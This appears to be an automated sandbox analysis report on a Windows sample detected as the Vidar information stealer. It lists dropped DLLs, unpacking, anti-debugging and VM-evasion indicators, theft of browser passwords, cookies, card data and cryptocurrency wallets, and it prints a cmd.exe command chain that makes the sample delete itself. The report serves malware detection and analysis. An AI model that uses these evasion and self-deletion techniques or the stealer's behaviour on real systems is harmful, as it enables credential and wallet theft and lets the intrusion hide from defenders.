Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: T6zZFfRLqs.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00417000 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,Process32Next,CloseHandle, 1_2_00417000
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: T6zZFfRLqs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
PE file contains sections with non-standard names
Source: mozglue[1].dll.1.dr Static PE information: section name: .didat
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary, 1_2_0041A730
Source: initial sample Static PE information: section name: .text entropy: 7.9868866426

Persistence and Installation Behavior:

barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00496880 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00496880
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 6920 Thread sleep count: 48 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll Jump to dropped file
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00492480 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00492694h 1_2_00492480
Is looking for software installed on the system
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0044E950 GetSystemInfo, 1_2_0044E950
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose, 1_2_0041B590
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW, 1_2_00496670
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose, 1_2_0041B810
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose, 1_2_0040EB20
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset, 1_2_00405D80
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok, 1_2_0040F150
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: T6zZFfRLqs.exe, 00000001.00000002.397837562.000000000082A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:NT

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004A31A7
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary, 1_2_0041A730
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041A030 GetProcessHeap,HeapAlloc,_strcpy_s, 1_2_0041A030
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00401000 mov eax, dword ptr fs:[00000030h] 1_2_00401000
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004A31A7

HIPS / PFW / Operating System Protection Evasion:

barindex
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Autofill\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\CC\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Edge_Cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\IE_Cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Downloads\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Files\Default.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\History\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\information.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\screenshot.jpg VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memmove,_memmove,_memset,LocalFree, 1_2_00492480
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_004AC142
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 1_2_004AB23B
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_004AC430
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_004AB4E6
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 1_2_00492360
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 1_2_00492360
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041F2B3 __wgetenv,__wgetenv,__wgetenv,_memset,GetVersionExA,CreateDirectoryA,_memset,__wgetenv,DeleteFileA,DeleteFileA,DeleteFileA, 1_2_0041F2B3
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00491AC0 GetUserNameA, 1_2_00491AC0

Stealing of Sensitive Information:

barindex
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i?? Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i?? Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????? Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????? Jump to behavior
